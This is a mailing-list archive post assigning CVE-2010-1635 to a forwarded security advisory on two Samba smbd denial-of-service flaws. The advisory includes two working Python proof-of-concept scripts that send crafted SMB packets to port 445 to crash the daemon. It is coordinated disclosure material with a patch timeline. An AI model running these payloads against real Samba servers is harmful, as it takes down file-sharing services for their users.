oss-sec mailing list archives
Re: Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities
From: Josh Bressers <bressers () redhat com>
Date: Tue, 25 May 2010 13:53:46 -0400 (EDT)
Please use CVE-2010-1635 Sorry for the delay, I've been out for a few days. -- JB ----- "Thomas Biege" <thomas () novell com> wrote:
So far no assignments were made, right? Am Donnerstag 20 Mai 2010 16:17:48 schrieb Thomas Biege:Hello oss-security, was a CVE-ID assigned for this issue already? Thanks, Thomas ---------- Forwarded Message ---------- Subject: [Full-disclosure] stratsec Security Advisory SS-2010-005:SambaMultiple DoS Vulnerabilities Date: Mittwoch 12 Mai 2010, 09:00:07 From: stratsec Advisories <advisories () stratsec net> An: "full-disclosure () lists grok org uk" <full-disclosure () lists grok org uk>=============================================================================== stratsec Security Advisory: SS-2010-005=============================================================================== Title: Samba Multiple DoS Vulnerabilities Version: 1.0 Issue type: Multiple Affected vendor: Samba Release date: 12/05/2010 Discovered by: Laurent Gaffié Issue status: Patch available=============================================================================== Summary ------- Two vulnerabilities were discovered within in the Samba Smbd daemonwhichallow an attacker to trigger a null pointer dereference or anuninitializedvariable read by sending a specific 'Sessions Setup AndX' query. Successful exploitation of these issues will result in a denial of service. Description ----------- The Server Message Block (SMB) protocol, also known as CommonInternet FileSystem (CIFS) acts as an application-layer protocol to providesharedaccess to files, printers and Inter-Process Communication (IPC). It is also a transport for Distributed Computing Environment / Remote ProcedureCall(DCE / RPC) operations. After negotiating an SMB communication theclientsends a 'Session Setup AndX' packet to negotiate a session in orderto beable to connect on a specific share. To trigger the null pointer dereference, the client needs to send acraftedSMB 'Negotiate Protocol' query with the SMB header 'Flags2' set to'0x0003'(no Unicode), followed by a Session Setup AndX request with the SMBheader'Flags2' set to '0x8003' (Unicode). This sequence will result in acrashwithin the Smbd process. The uninitialised Variable Read issue, can be triggered if theclient sendsa crafted 'Session Setup AndX' with a 'security blob length' valueset to'\xff\xff'. Impact ------ A remote attacker can cause a denial of service within the SambadaemonAffected products ----------------- Samba <=3.4.7 and Samba <= 3.5.1 Proof of concept ---------------- To trigger the uninitialised variable read issue, the followingPythonproof of concept is available: import sys,socket from socket import * if len(sys.argv)<=1: sys.exit('Usage: python smbd.py 10.0.0.12') host = sys.argv[1],445 packetnego=( "\x00\x00\x00\xaa" "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x03\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00\x00" "\x00\x87\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50" "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x1a\x45\x4e\x49" "\x58\x20\x43\x4f\x52\x45\x00\x02\x4d\x49\x43\x52\x4f\x53\x4f\x46" "\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x2e\x30\x33\x00" "\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64" "\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75" "\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30" "\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e" "\x54\x20\x4c\x4d\x20\x76\x2e\x31\x32\x00" ) payload=( "\x00\x00\x01\xa3" "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x03\x80\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x41\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00" "\x00\x0d\x75\x00\xd6\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00" "\x18\x00\x18\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x99\x00\x36\xed" "\x7f\xf4\x6b\xeb\x15\x65\x2e\xb5\xc9\x70\xbe\x39\xfa\x89\x56\x5b" "\xb0\xc2\x56\x40\x11\x6c\xe6\x33\x1e\x93\x02\xd3\xd3\x2e\x17\xad" "\x1f\x37\x23\xcf\x7e\x4c\xd7\x64\xbe\xd5\xdc\x1f\x23\xe0\x69\x41" "\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00\x72" "\x00\x61\x00\x74\x00\x65\x00\x75\x00\x72\x00\x00\x00\x4e\x00\x54" "\x00\x34\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77" "\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x31\x00\x33\x00\x38" "\x00\x31\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f" "\x00\x77\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x34\x00\x2e" "\x00\x30\x00\x00\x00\x00\x00\x04\xff\x00\x00\x00\x00\x00\x01\x00" "\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31" "\x00\x36\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x00\x30\x00\x34" "\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f" "\x3f\x3f\x00" ) s = socket(AF_INET, SOCK_STREAM) s.connect(host) s.send(''.join(packetnego)) s.send(''.join(payload)) To trigger the null pointer dereference issue this Python proof of concept is available: import sys,socket from socket import * if len(sys.argv)<=1: sys.exit('python smbd.py 10.0.0.12') host = sys.argv[1],445 packetnego=( "\x00\x00\x00\x85" "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00" "\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50" "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d" "\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66" "\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e" "\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20" "\x30\x2e\x31\x32\x00" ) payload=( "\x00\x00\x00\xec" "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00" "\x0c\xff\x00\xec\x00\x04\x11\x32\x00\x00\x00\x00\x00\x00\x00" "\xff\xff" ## Security blob set to \xff\xff here "\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\x60\x48\x06\x06\x2b" "\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b" "\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c" "\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28" "\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00" "\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00" "\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00" "\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00" "\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00" "\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00" "\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00" ) s = socket(AF_INET, SOCK_STREAM) s.connect(host) s.send(''.join(packetnego)) s.send(''.join(payload)) Solution -------- Update to version 3.5.2 or 3.4.8 (http://samba.org/) Response timeline ----------------- * 09/03/2010 - Null pointer dereference issue reported to vendor. * 09/03/2010 - Vendor acknowledges receipt of advisory 2 hoursafterreceiving the initial email * 09/03/2010 - Vendor confirms issue presence, and provide a patch3hours after receiving the initial email. * 09/03/2010 - stratsec confirms patch resolves issue. * 15/03/2010 - Uninitialised Variable Read issue reported tovendor.* 15/03/2010 - Vendor confirms the issue and provides a patch 5hoursafter receiving the initial email. * 15/03/2010 - stratsec confirms patch resolves issue * 07/04/2010 - Version 3.5.2 released by the vendor fixing bothissues.* 11/05/2010 - Version 3.4.8 released by the vendor fixing bothissues.* 12/05/2010 - This advisory published. References ---------- * Vendor advisory: http://samba.org/samba/history/samba-3.4.8.html * https://bugzilla.samba.org/show_bug.cgi?id=7254 * stratsec would like to thanks the Samba Security Team for their responsiveness while handling theses issues=============================================================================== About stratsec -------------- stratsec, specialises in providing information security consultingandtesting services for government and commercial clients. Establishedin2004, we are now one of the leading independent informationsecuritycompanies in the Australasian and SE-Asian region, with officesthroughoutAustralia and in Singapore and Malaysia. For more information, please visit our website athttp://www.stratsec.net/===============================================================================-- Thomas Biege <thomas () novell com>, SUSE LINUX, Security Support & Auditing SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
Current thread:
- Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities Thomas Biege (May 20)
- Re: Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities Thomas Biege (May 25)
- Re: Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities Josh Bressers (May 25)
- Re: Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities Tomas Hoger (May 26)
- <Possible follow-ups>
- Re: Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities Josh Bressers (May 25)
- Re: Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities Thomas Biege (May 26)
- Re: Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities (3.3.x) Eren Türkay (May 27)
- Re: Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities (3.3.x) Tomas Hoger (May 28)
- Re: Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities (3.3.x) Eren Türkay (May 28)
- Re: Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities (3.3.x) Tomas Hoger (May 31)
- Re: Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities Thomas Biege (May 25)